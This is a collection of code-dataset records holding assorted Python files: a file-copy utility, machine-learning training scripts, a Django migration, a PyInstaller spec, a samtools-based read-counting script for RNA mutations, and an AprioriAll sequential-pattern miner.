os.path.exists(p):\n shutil.copy(p, to_dir)\n return True\n except Exception as e:\n return False\n\n\ndef copy_folder(source, target):\n if not os.path.exists(source):\n return False\n dir_util.copy_tree(source, target)\n return True\n\n\ndef copy_by_template(client, token, user_dir):\n client = client if client else 'web'\n now = datetime.now().strftime('%Y%m%d%H%M%S')\n old_project_path = os.path.join(user_dir, client, 'project')\n new_project_path = os.path.join(user_dir, client, 'project-' + now)\n if os.path.exists(old_project_path):\n os.rename(old_project_path, new_project_path)\n dir_util._path_created = {}\n images_dir = os.path.join(STATIC_FILES_PATH, 'images', 'templates', token)\n images_target = os.path.join(user_dir, client, 'project', 'static', 'images', token)\n js_dir = os.path.join(STATIC_FILES_PATH, 'js/lib')\n user_images_dir = os.path.join(user_dir, 'images')\n if os.path.exists(user_images_dir):\n user_images_folder = os.path.join(user_dir, client, 'project', 'static', 'images')\n copy_folder(user_images_dir, user_images_folder)\n if os.path.exists(images_dir):\n copy_folder(images_dir, images_target)\n if os.path.exists(js_dir):\n copy_folder(js_dir, os.path.join(user_dir, client, 'project/static/js/lib'))\n\n\ndef read_static_file(user, static_url):\n static_path_list = [x for x in static_url.split(os.sep) if x]\n if static_path_list[0] == 'static':\n static_path_list.pop(0)\n _static_path = os.path.join(*static_path_list)\n user_absolute_path = os.path.join(USER_FILES_PATH, _static_path)\n content = \"\"\n if os.path.exists(user_absolute_path):\n content = open(user_absolute_path, 'r').read()\n return content\n absolute_path = os.path.join(STATIC_FILES_PATH, _static_path)\n if os.path.exists(absolute_path):\n content = open(absolute_path, 'r').read()\n return content\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"util/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382000134","text":"import numpy as np\nimport tensorflow as tf\nimport tensorlayer as tl\n\nsess = tf.InteractiveSession()\n\nfeat_train, lab_train, feat_valid, lab_valid, feat_test, lab_test = tl.files.load_mnist_dataset(shape=(-1,784))\n\ninput_feature = tf.placeholder(tf.float32, [None,784] , name='input_feature')\ninput_label = tf.placeholder(tf.int64, [None,], name='input_label')\n\n# print(type(input_feature)) # \n# print(input_feature._shape) # (?, 784)\n\nnetwork = tl.layers.InputLayer(inputs = input_feature, name ='input_layer')\n#print(network.all_layers) # []\n#print(network.all_params) # []\n#print(network.all_drop) # {}\n\n#print(type(network)) # \n\nnetwork = tl.layers.DropoutLayer(network, keep=0.8, name='dropout_layer_1')\n#print(network.all_layers) # []\n#print(network.all_params) # []\n#print(network.all_drop) # { dtype=float32>: 0.8}\n\nnetwork = tl.layers.DenseLayer(network, n_units=800,act = tf.nn.relu, name='dense_relu_1')\n#print(network.all_layers) # [, ]\n#print(network.all_params) # [, ]\n#print(network.all_drop) # { dtype=float32>: 0.8}\n\nnetwork = tl.layers.DropoutLayer(network, keep=0.5, name='dropout_layer_2')\n#print(type(network)) # \n\nnetwork = tl.layers.DenseLayer(network, n_units=800,act = tf.nn.relu, name='dense_relu_2')\n#print(type(network)) # \n\nnetwork = tl.layers.DropoutLayer(network, keep=0.5, name='dropout_layer_3')\n#print(type(network)) # \n\nnetwork = tl.layers.DenseLayer(network, n_units=10, act = tf.identity, name='output_layer')\n#print(type(network)) # \n\npredict_label = network.outputs\n#print(type(predict_label)) # \n\n#print(predict_label._shape) # (?, 10)\n#print(input_label._shape) # (?,)\ncost = tl.cost.cross_entropy(predict_label, input_label) \n#print(type(cost)) # \n\ntrain_params = network.all_params\n#print(train_params)#[, , , , , ]\noptimizer = tf.train.AdamOptimizer(0.0001).minimize(cost, var_list=train_params)\n\ncorrect = tf.equal(tf.argmax(predict_label, 1), input_label)\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\nsess.run(tf.initialize_all_variables())\n\nnetwork.print_params()\nnetwork.print_layers()\n\ntl.utils.fit(sess, network, optimizer, cost, feat_train, lab_train, input_feature, input_label,\n acc=accuracy, batch_size=500, n_epoch=500, print_freq=5,\n X_val=feat_valid, y_val=lab_valid, eval_train=True)\n\ntl.utils.test(sess, network, accuracy, feat_test, lab_test, input_feature, input_label, batch_size=None, cost=cost)\n\ntl.files.save_npz(network.all_params , name='model.npz')\n\nsess.close()","sub_path":"Basic/mnist_simple.py","file_name":"mnist_simple.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543778538","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('vcard', '0014_project_description'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='projecttag',\n name='alias',\n ),\n migrations.AddField(\n model_name='projecttag',\n name='url_name',\n field=models.SlugField(default='some-url-name', max_length=255),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='project',\n name='url_name',\n field=models.SlugField(max_length=255, unique=True),\n ),\n ]\n","sub_path":"vcard/migrations/0015_auto_20160618_0816.py","file_name":"0015_auto_20160618_0816.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"341304278","text":"# -*- mode: python ; coding: utf-8 -*-\n\n# Build empress as macOS app bundle\n\nblock_cipher = None\n\n\na = Analysis(['../empress_gui.py'],\n pathex=['pyinstaller_spec'],\n binaries=[],\n datas=[(\"../assets\", \"./assets\")],\n # pkg_resources.py2_warn hidden import needed if setuptools>=45.0.0\n # https://github.com/pypa/setuptools/issues/1963#issuecomment-574265532\n hiddenimports=['pkg_resources.py2_warn'],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n [],\n exclude_binaries=True,\n name='empress_gui',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n upx_exclude=[],\n name='empress')\napp = BUNDLE(coll,\n name='empress.app',\n icon=None,\n bundle_identifier=None,\n info_plist={\n 'NSPrincipalClass': 'NSApplication', # Enable retina display\n 'CFBundleName': 'Empress DTL Computational Biology Tool', # Enable Siri\n }\n )\n","sub_path":"pyinstaller_spec/empress_gui_app.spec","file_name":"empress_gui_app.spec","file_ext":"spec","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"528747563","text":"import configs.titanic as cfg\nfrom utils.utils import *\nfrom utils.data_loading import load_processed_dataset\nimport os\nfrom CSDGAN.classes.tabular.TabularCGAN import TabularCGAN\nfrom CSDGAN.classes.tabular.TabularDataset import TabularDataset\nfrom torch.utils import data\nimport pickle as pkl\nimport random\n\n# Set random seem for reproducibility\nprint(\"Random Seed: \", cfg.MANUAL_SEED)\nrandom.seed(cfg.MANUAL_SEED)\ntorch.manual_seed(cfg.MANUAL_SEED)\n\n# Ensure directory exists for outputs\nexp_path = os.path.join(\"experiments\", cfg.EXPERIMENT_NAME)\nos.makedirs(exp_path, exist_ok=True)\n\n# Import data\ntitanic = load_processed_dataset('titanic')\n\n# Automatically determine these parameters and complete preprocessing\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available()) else \"cpu\")\n\n# Instantiate data set and generator\ndataset = TabularDataset(df=titanic,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n int_inputs=cfg.INT_INPUTS,\n test_size=cfg.TEST_SIZE,\n seed=cfg.MANUAL_SEED)\ndataset.to_dev(device)\ndata_gen = data.DataLoader(dataset, **cfg.TRAINING_PARAMS)\n\n# Define GAN\nCGAN = TabularCGAN(data_gen=data_gen,\n device=device,\n path=exp_path,\n seed=cfg.MANUAL_SEED,\n eval_param_grid=cfg.EVAL_PARAM_GRID,\n eval_folds=cfg.EVAL_FOLDS,\n test_ranges=cfg.TEST_RANGES,\n eval_stratify=dataset.eval_stratify,\n **cfg.CGAN_INIT_PARAMS)\n\n# Eval on real data\nscore_real = train_test_logistic_reg(x_train=dataset.x_train.numpy(),\n y_train=dataset.y_train.numpy(),\n x_test=dataset.x_test.numpy(),\n y_test=dataset.y_test.numpy(),\n param_grid=cfg.EVAL_PARAM_GRID,\n cv=cfg.EVAL_FOLDS,\n random_state=cfg.MANUAL_SEED,\n labels_list=dataset.labels_list,\n verbose=True)\n\n# Train GAN\nCGAN.train_gan(num_epochs=cfg.NUM_EPOCHS, cadence=cfg.CADENCE, print_freq=cfg.PRINT_FREQ, eval_freq=cfg.EVAL_FREQ)\n\n# Load best-performing GAN\nCGAN.load_netG(best=True)\n\n# Fit another model to double-check results\nCGAN.test_model(stratify=CGAN.eval_stratify)\n\n# Save GAN\nwith open(os.path.join(exp_path, \"CGAN.pkl\"), 'wb') as f:\n pkl.dump(CGAN, f)\n\n# Visualizations\nCGAN.plot_progress(benchmark_acc=score_real, show=True, save=exp_path)\nCGAN.plot_training_plots(show=True, save=exp_path)\nCGAN.netG.plot_layer_scatters(title=\"Generator\", show=True, save=exp_path)\nCGAN.netD.plot_layer_scatters(title=\"Discriminator\", show=True, save=exp_path)\nCGAN.netG.plot_layer_hists(title=\"Generator\", show=True, save=exp_path)\nCGAN.netD.plot_layer_hists(title=\"Discriminator\", show=True, save=exp_path)\n\ngenned_df = CGAN.gen_data(size=cfg.TEST_RANGES[3], stratify=dataset.eval_stratify)\nplot_scatter_matrix(df=genned_df, cont_inputs=cfg.CONT_INPUTS, title=\"Fake Data\", scaler=None, show=True, save=exp_path)\nplot_scatter_matrix(df=titanic, cont_inputs=cfg.CONT_INPUTS, title=\"Real Data\", scaler=None, show=True, save=exp_path)\n\ncompare_cats(real_df=titanic, fake_df=genned_df, x='Sex', y='Survived', hue='Pclass', show=True, save=exp_path)\n\nplot_conditional_scatter(col1='sepal_len',\n col2='sepal_wid',\n real_df=titanic,\n fake_df=genned_df,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n labels_list=dataset.labels_list,\n scaler=None,\n alpha=0.25,\n show=True,\n save=exp_path)\n\nplot_conditional_density(col='petal_len',\n real_df=titanic,\n fake_df=genned_df,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n labels_list=dataset.labels_list,\n scaler=None,\n show=True,\n save=exp_path)\n","sub_path":"notebooks/prototypes/titanic/titanic_v2.py","file_name":"titanic_v2.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295740262","text":"import lab7a\n\ndb = [[['författare', ['john', 'zelle']],\n ['titel', ['python', 'programming', 'an', 'introduction', 'to',\n 'computer', 'science']],\n ['år', 2010],\n ['genre', \"programmering\"]],\n [['författare', ['armen', 'asratian']],\n ['titel', ['diskret', 'matematik']],\n ['år', 2012],\n ['genre', \"matematik\"]],\n [['författare', ['j', 'glenn', 'brookshear']],\n ['titel', ['computer', 'science', 'an', 'overview']],\n ['år', 2011],\n ['genre', \"matematik\"]],\n [['författare', ['john', 'zelle']],\n ['titel', ['data', 'structures', 'and', 'algorithms', 'using', 'python',\n 'and', 'c++']],\n ['år', 2009],\n ['genre', \"programmering\"]],\n [['författare', ['anders', 'haraldsson']],\n ['titel', ['programmering', 'i', 'lisp']],\n ['år', 1993],\n ['genre', \"programmering\"]]]\n\n\ndef test():\n expected_results = [[db[0], db[3]], [db[0], db[2]], []]\n\n result = lab7a.search(['författare', ['john', '&']], db)\n assert result == expected_results[0]\n\n result = lab7a.search(['titel', ['--', 'an', '--']], db)\n assert result == expected_results[1]\n\n result = lab7a.search(['år', 2007], db)\n assert result == expected_results[2]\n\n result = lab7a.search([['författare', ['&', '&']], ['titel',\n ['--', 'python', '--']], ['år', \"&\"],\n ['genre', \"programmering\"]], db)\n assert result == expected_results[0]\n\n result = lab7a.search([['författare', ['&', 'zelle']], ['titel',\n ['--', 'python', '--']], ['genre', \"svenska\"]], db)\n assert result == expected_results[2]\n\n result = lab7a.search([], db)\n assert result == expected_results[2]\n\n result = lab7a.search(['genre', \"&\"], db)\n assert result == db\n print(\"Passed all tests\")\n\n\ntest()\n","sub_path":"lab7/testa.py","file_name":"testa.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"475264135","text":"import pandas as pd\nfrom sklearn import ensemble, preprocessing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\n\n\ndata = pd.read_csv('drivers_50000.csv')\n\ndata.at[data['Accidents'] > 0, 'AccidentsBin'] = 1\ndata.at[data['Accidents'] == 0, 'AccidentsBin'] = 0\n\nXX = data[\n ['Age', 'Experience', 'PreviousAccidents', 'RouteDistance', 'Distance', 'HomeLat', 'HomeLng', 'WorkLat', 'WorkLng']]\ny = data['AccidentsBin']\nX = preprocessing.scale(XX)\nfeature_names = XX.columns\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=11)\n\ndef show_feature_importances(X, y,feature_names):\n\n rf = ensemble.RandomForestClassifier(random_state=11)\n param_grid = {'n_estimators':[55,75,100],'criterion':[\"entropy\",\"gini\"]}\n grid = GridSearchCV(estimator=rf, param_grid=param_grid, scoring='neg_log_loss')\n grid.fit(X,y)\n best=grid.best_estimator_\n importances = best.feature_importances_\n indices = np.argsort(importances)[::-1]\n\n\n d_first = len(feature_names)\n plt.figure(figsize=(8, 8))\n plt.title(\"Feature importances\")\n plt.bar(range(d_first), importances[indices[:d_first]], align='center')\n plt.xticks(range(d_first), np.array(feature_names)[indices[:d_first]], rotation=90)\n plt.xlim([-1, d_first]);\n plt.show()\n\nshow_feature_importances(X_train,y_train,feature_names)\n\n\ndef cluster_locations(data_input,n_clusters=10):\n homeLoc = data[['HomeLat', 'HomeLng']].values\n workLoc = data[['WorkLat','WorkLng']].values\n k_means_home = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n k_means_home.fit(homeLoc)\n k_means_work = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n k_means_work.fit(workLoc)\n data_input = data_input.assign(work=pd.Series(k_means_work.labels_, dtype=\"category\"))\n data_input = data_input.assign(home=pd.Series(k_means_home.labels_, dtype=\"category\"))\n data_input = data_input.drop(['WorkLat', 'WorkLng', 'HomeLat', 'HomeLng'], axis=1)\n data_input = data_input.dropna()\n home_work_vector = pd.get_dummies(data_input[['home', 'work']])\n data_input = data_input.drop(['home','work'],axis=1)\n data_input= pd.concat([data_input, home_work_vector], axis=1)\n return data_input\n\ndata=cluster_locations(data)\nprint(data.info())\nXX = data.drop(['AccidentsBin','Accidents','Skill','RushFactor'],axis=1)\ny = data['AccidentsBin']\nX = preprocessing.scale(XX)\nfeature_names = XX.columns\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=11)\n\nshow_feature_importances(X_train,y_train,feature_names)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"205436766","text":"### pickler.py\n### the pickle module can save objects to a binary file\n### this is called SERIALIZATION.\n### the file can be 'unpickled' to retrieve the object.\n\ndef main():\n\n states = {'FL':'Tallahassee','GA':'Atlanta',\n 'NY':'New York','CA':'Sacramento',\n 'OH':'Columbus','NH':'Concord'}\n\n\n\n \nmain()\n\n\n\n \n","sub_path":"Week 3 Files/dicts 510/pickler.py","file_name":"pickler.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"463484582","text":"#! /usr/bin/env python3\n\n\"\"\"\nThe program check bam or cram from the filename.\n\"\"\"\n\nfrom pathlib import Path\nimport pysam\nimport subprocess\n\n\ndef juncmut_supportread_count(input_file, output_file, bam_file, reference):\n\n\n def check_read(read):\n\n check_flag = True \n\n # get the flag information\n flags = format(int(read.flag), \"#014b\")[:1:-1]\n\n # skip unmapped read \n if flags[2] == \"1\" or flags[3] == \"1\": check_flag = False\n \n # skip supplementary alignmentx\n if flags[8] == \"1\" or flags[11] == \"1\": check_flag = False\n\n # skip duplicated reads\n if flags[10] == \"1\": check_flag = False\n\n return(check_flag)\n\n \n def tidy_reads(seq, qualities, read_ids, mut_mut):\n import re\n read_id_list = read_ids.split(',')\n proc = \"\"\n Q = 15\n pos_read_id_list = []\n seq_length = len(seq)\n baseIndex = 0\n # modify seq to 1 base presented by a char.\n while baseIndex < seq_length:\n #A ’>’ or ’<’ for a reference skip.\n # The deleted bases will be presented as ‘*’ in the following lines. \n if seq[baseIndex] == '>' or seq[baseIndex] == '<' or seq[baseIndex] == '*' :\n proc = proc + seq[baseIndex]\n baseIndex += 1 \n #A '^' the end or start of read, following the quality and the base.\n elif seq[baseIndex] == '^':\n proc = proc + seq[baseIndex+2]\n baseIndex += 3\n #A '$' is the last position of read. \n elif seq[baseIndex] == '$':\n baseIndex += 1\n #\\+[0-9]+[bases] or -[0-9]+[bases] means the deletion and the insertion. For example, +2AG means insertion of AG in the forward strand\n elif seq[baseIndex] == '+' or seq[baseIndex] == '-':\n indel_length = re.search(r'\\d+', seq[baseIndex:]).group()\n baseIndex += len(str(indel_length))+int(indel_length)+1 \n else:\n proc = proc + seq[baseIndex]\n baseIndex += 1\n \n # quality and base check. extract id.\n for i in range(0, len(proc),1):\n if proc[i].upper() == mut_mut:\n if (ord(qualities[i])-33) > Q:\n pos_read_id_list.append(read_id_list[i])\n \n return pos_read_id_list\n\n b_path = Path(bam_file)\n\n if b_path.suffix == '.bam':\n bamfile = pysam.AlignmentFile(bam_file, 'rb')\n if b_path.suffix == '.cram':\n bamfile = pysam.AlignmentFile(bam_file, 'rc')\n \n ## start \n hout = open(output_file, 'w') \n header = [\"Mut_key\", \"SJ_key\", \"Sample\", \"SJ_Type\", \"SJ_Strand\", \"SJ_Read_Count\", \"SJ_Depth\", \"SJ_Freq\",\n \"Ref_Motif\", \"Possivle_Alt_Motif\",\"Possible_Alt_key\", \"Is_GT/AG\", \"Is_in_exon\",\"SJ_Overlap_Count\", \n \"Chr\",\"Mut_Pos\", \"Mut_Ref\", \"Mut_Alt\", \"Mut_Count\", \"Mut_Depth\", \"Mut_Freq\",\n \"Realign_No_SJ_Neg\", \"Realign_No_SJ_Pos\", \"Realign_Target_SJ_Neg\", \"Reaglin_Target_SJ_Pos\",\n \"Realign_Normal_SJ_Neg\", \"Realign_Normal_SJ_Pos\",\"Realign_result\",\"support_read_rmdup\",\"RNA_Mut\"]\n print('\\t'.join(header), file = hout)\n # for each row.\n with open(input_file, 'r') as hin:\n next(hin)\n for line in hin:\n lie = line.rstrip('\\n')\n F = line.rstrip('\\n').split('\\t')\n # Is a position of mutation in Exon or Intron\n if F[-1] != \"True\": continue\n #print(lie + \"\\t0\\tFalse\", file = hout) \n else:\n #mpileup\n mut_elm = F[0].split(',')\n mut_chr = mut_elm[0]\n mut_pos = str(mut_elm[1])\n mut_mut = mut_elm[3]\n #samtools mpileup -r chr4:162087015-162087015 -f /Volumes/NIIDA_SSD1R/genome DRR016694.Aligned.sortedByCoord.out.bam\n mpileup_commands = [\"samtools\", \"mpileup\", \"-r\", mut_chr+\":\"+mut_pos+\"-\"+mut_pos, \"-f\", reference, bam_file, \"--output-QNAME\", \"-o\", output_file + \".tmp1.txt\"]\n subprocess.run(mpileup_commands)\n \n # extract read id with mutations.\n pos_read_list = []\n with open(output_file + \".tmp1.txt\", 'r') as tin:\n for line in tin: \n col = line.rstrip('\\n').split('\\t')\n bases = col[4]\n qualities = col[5]\n read_ids = col[6]\n \n reads_with_mut_list = tidy_reads(bases, qualities, read_ids, mut_mut)\n \n for read in bamfile.fetch(region = str(mut_chr) + ':' + str(mut_pos) + '-' + str(mut_pos)):\n if not check_read(read): continue\n else:\n if read.qname in reads_with_mut_list:\n pos_read = str(read.reference_start) + '_' + str(read.reference_end) + '_' + str(read.next_reference_start) \n pos_read_list.append(pos_read)\n support_read_rmdup = len(set(pos_read_list))\n if support_read_rmdup >= 2:\n rna_mut = \"True\"\n print(lie + \"\\t\"+ str(support_read_rmdup) + \"\\t\" + str(rna_mut), file = hout) \n #else: rna_mut = \"False\"\n \n #print(lie + \"\\t\"+ str(support_read_rmdup) + \"\\t\" + str(rna_mut), file = hout) \n \n Path(output_file + \".tmp1.txt\").unlink()\n\n bamfile.close()\n hout.close()\n\n \n\nif __name__ == \"__main__\":\n \n import argparse\n \n parser = argparse.ArgumentParser() #make a parser\n \n parser.add_argument(\"-input_file\", metavar = \"input_file\", default = None, type = str,\n help = \"input file\") \n parser.add_argument(\"-output_file\", metavar = \"output_file\", default = None, type = str,\n help = \"output files\") \n parser.add_argument(\"-bam_file\", metavar = \"bam_file\", default = None, type = str,\n help = \"output files\") \n parser.add_argument(\"-reference\", metavar = \"reference\", default = None, type = str,\n help = \"reference\") \n args = parser.parse_args()\n \n input_file = args.input_file\n output_file = args.output_file\n bam_file = args.bam_file\n reference = args.reference\n \n juncmut_supportread_count(input_file, output_file, bam_file, reference)\n \n\"\"\"\ntidy_bases(bases, qualities)\nbases = \"<<>><>><><><<<<>><<>>>>>>G>>><>>>><<>>>><>><<>>>>>>>>>CCC\"\nqualities =\t\"FFmcFllHDJmJJJJHsIJJiFJI7JmJGJJJk>JJJsJJIFJCDH7FFFDFDFJFF\"\n\"\"\"\n\n\n","sub_path":"juncmut/juncmut_supportread_count.py","file_name":"juncmut_supportread_count.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125765791","text":"# Reference: http://hexo.tanglei.name/blog/aprioriall-algorithm-in-python.html\n# Reference: https://blog.csdn.net/tszw1007/article/details/77871133\nimport copy\nimport math\nimport re\n\ndef getSubSets(items, remove_origin=False):\n # the power set of the empty set has one element, the empty set\n result = [[]]\n for x in items:\n result.extend([subset + [x] for subset in result])\n if(remove_origin):\n result.pop()\n result.remove([])\n return result\n\nclass Basket():\n items=[]#Apple,orange,....\n def __init__(self,items):\n self.items = items\n def setItems(self,items):\n self.items = items\n def __str__(self):\n mystr='Basket[ '\n for i in self.items:\n mystr = mystr + i +' , '\n mystr += ']'\n return mystr\n \nclass Custom():\n baskets=[]#basket1,basket2\n mapNums=set()#maped num\n def __init__(self,baskets):\n self.baskets = baskets\n def setBaskets(self,baskets):\n self.baskets = baskets\n def setMapedNums(self,mapNums):\n self.mapNums = mapNums\n def __str__(self):\n mystr='Custom[ '\n for i in self.baskets:\n mystr = mystr + i.__str__() +' , '\n mystr += ']'\n return mystr\n def getMapedNums(self):\n return self.mapNums\n \nclass AprioriAll():\n customs=[]\n minSuppCount = 0#count number ,considering the min_supp and the num of transactions\n allBaskets=[]\n transMap={}\n def __init__(self,min_supp=0.4,datafile='aprioriall.txt'):\n inputfile = open(datafile,\"r\")\n self.min_supp = min_supp\n baskets=[]\n self.customs=[]\n for line in inputfile.readlines():\n if(line != \"\\n\"):\n items = re.compile(r\"\\w+\").findall(line)\n basket = Basket(items)\n baskets.append(basket)\n else:\n custom = Custom((baskets))\n self.customs.append(custom)\n baskets=[] \n #add the last custom \n custom = Custom((baskets))\n self.customs.append(custom)\n \n self.minSuppCount = math.ceil(min_supp * len(self.customs))\n \n def sortPhase(self):\n '''sort the transaction db :with customer-id as the major key and \n transaction-time as the minor key. '''\n #has been done in the constructor\n pass\n \n def litemsetPhase(self):\n ''' find all the fequent-itemsets whose support is above the threshold'''\n litemset = []\n items = []\n allBaskets = []\n for custom in self.customs:\n for basket in custom.baskets:\n allBaskets.append(basket)\n for item in basket.items:\n if [item] not in items:\n items.append([item])\n \n items.sort()\n \n #remove who blow the threshold\n candidates=items\n while True:\n temp=[]\n for item1 in candidates:\n count = 0\n for basket in allBaskets:\n set1 = set(item1)\n if set1.issubset(basket.items):\n count += 1\n if count >= self.minSuppCount:\n print(\"Frequent %d-itemset : %s\" %(len(item1),item1))\n temp.append(item1)\n litemset.append(item1)\n \n candidates = self.__genCandidate(temp)\n if len(candidates) == 0 :\n break\n self.allBaskets = allBaskets\n return litemset\n \n def transformationPhase(self,transmap):\n for custom in self.customs:\n mapNums=set()#store the maped numbers of each custom\n for basket in custom.baskets:\n for k in transmap.keys():\n s1 = set(transmap[k])\n s2 = set(basket.items)\n if s1.issubset(s2):\n mapNums.add(k)\n custom.setMapedNums(mapNums) \n \n def sequencePhase(self,mapNums):\n \n item1set = set()#\n for num in mapNums :\n item1set=item1set.union(num)\n \n item1list=list(item1set)\n item1list.sort()\n \n seqresult=[]\n candidates=[]\n for item in item1list:\n candidates.append([item])\n while True:\n for item in candidates:\n count = 0 \n for seq in mapNums:\n s1 = set(item)\n if s1.issubset(seq):\n count += 1\n if count >= self.minSuppCount:\n print(\"Frequent %-itemsets : %s\" %(len(item),item))\n seqresult.append(item) \n candidates = self.__genCandidate(candidates) \n if len(candidates) == 0 :\n break\n return seqresult\n def maxSeq(self,seqs):\n maxSeq=copy.deepcopy(seqs)\n for seq in seqs:\n t_set = set(seq)\n for seq1 in seqs:\n t_set1 = set(seq1)\n if t_set1 != t_set and t_set1.issuperset(t_set):\n maxSeq.remove(seq)\n break\n return self.__map2seq(maxSeq) \n def createTransMap(self,litemset):\n transmap = {}\n value = 1\n for each in litemset:\n transmap[value]=each\n value += 1\n self.transMap = transmap\n return transmap\n \n def __map2seq(self,seqs):\n #transform numseq to original seq\n origSeqs = []\n for seq in seqs:\n origSeq=[]\n for item in seq: \n origSeq.append(self.transMap[item])\n origSeqs.append(origSeq)\n return origSeqs \n def __genCandidate(self,frequentItems): \n #gen new canidate\n length = len(frequentItems) \n result = []#add one item \n for i in range(length):\n for j in range(i+1,length):\n if self.__lastDiff(frequentItems[i],frequentItems[j]):\n item = copy.deepcopy(frequentItems[i])\n item.insert(len(frequentItems[i]),frequentItems[j][len(frequentItems[j])-1])\n if False == self.__has_inFrequentItemsets(frequentItems, item):\n result.append(item)\n return result\n #check if there is none subsets of item in the frequentItems \n def __has_inFrequentItemsets(self,frequentItems,item):\n subs = getSubSets(item,remove_origin=True)\n for each in subs:\n if(each == []):\n continue\n flag=False\n for i in frequentItems:\n if i == each:\n flag=True\n break \n if flag==False:\n return True \n return False #there is at least one subset in the freq-items\n \n def __lastDiff(self,items1,items2):\n if len(items2) != len(items1):#length should be the same\n return False\n if items1 == items2:#if all the same,return false\n return False\n return items1[:-1] == items2[:-1] \n\n\nif __name__ == '__main__':\n aa = AprioriAll(min_supp=0.4,datafile='aprioriall2.txt')\n litemset = aa.litemsetPhase()\n print(\"litemset:\");print(litemset)\n transmap = aa.createTransMap(litemset);\n print(\"transformation map :\");print(transmap)\n aa.transformationPhase(transmap)\n customs = aa.customs\n mapNums = []\n for each in customs:\n mapNums.append(each.getMapedNums())\n seqNums = aa.sequencePhase(mapNums)\n maxSeqs= aa.maxSeq(seqNums)\n print(\"The sequential patterns :\");print(maxSeqs)","sub_path":"anonymous-msweb/aprioriall.py","file_name":"aprioriall.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"493458944","text":"#binary search\ndef search_pos(A, i, key):\n\tlow = 0\n\thigh = i - 1\n\twhile low < high:\n\t\tmid = (low + high)//2\n\t\tif key < A[mid]:\n\t\t\thigh = mid - 1\n\t\telse:\n\t\t\tlow = mid + 1\n\treturn low\n\n#with recursion\ndef search_pos(A, i, key):\n\tlow = 0\n\thigh = i - 1\n\tmid = (low + high)// 2\n\tif key >= A[mid] and key <= A[mid + 1]:\n\t\treturn mid\n\tif key < A[mid]:\n\t\treturn search_pos(A[low:mid], key)\n\tif key > A[mid]:\n\t\treturn search_pos(A[mid:high], key)\n\ndef binary_insertion_sort(A):\n\tfor i in range(1, len(A)):\n\t\tkey = A[i]\n\t\tpos = binary_search(A, i, key)\n\t\tfor j in range(i, pos, -1):\n\t\t\tA[j] = A[j - 1]\n\t\tA[pos] = key\n\treturn A\n\t\n","sub_path":"sort/binary_insertion_sort.py","file_name":"binary_insertion_sort.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417825781","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\ndataset = pd.read_csv('Marketing_Data.csv')\nX = dataset.iloc[:, :-1]\ny = dataset.iloc[:, :1]\nprint(dataset)\nprint(X)\nprint(y)\n\n\n# In[3]:\n\n\ndataset.isnull().sum()\n\n\n# In[4]:\n\n\ndataset.head()\n\n\n# In[5]:\n\n\ndataset.tail()\n\n\n# In[6]:\n\n\ndataset.describe()\n\n\n# In[7]:\n\n\ndataset.info()\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 2)\nX_train, X_test, y_train, y_test\n\n\n# In[9]:\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n\n# In[10]:\n\n\ny_pred = 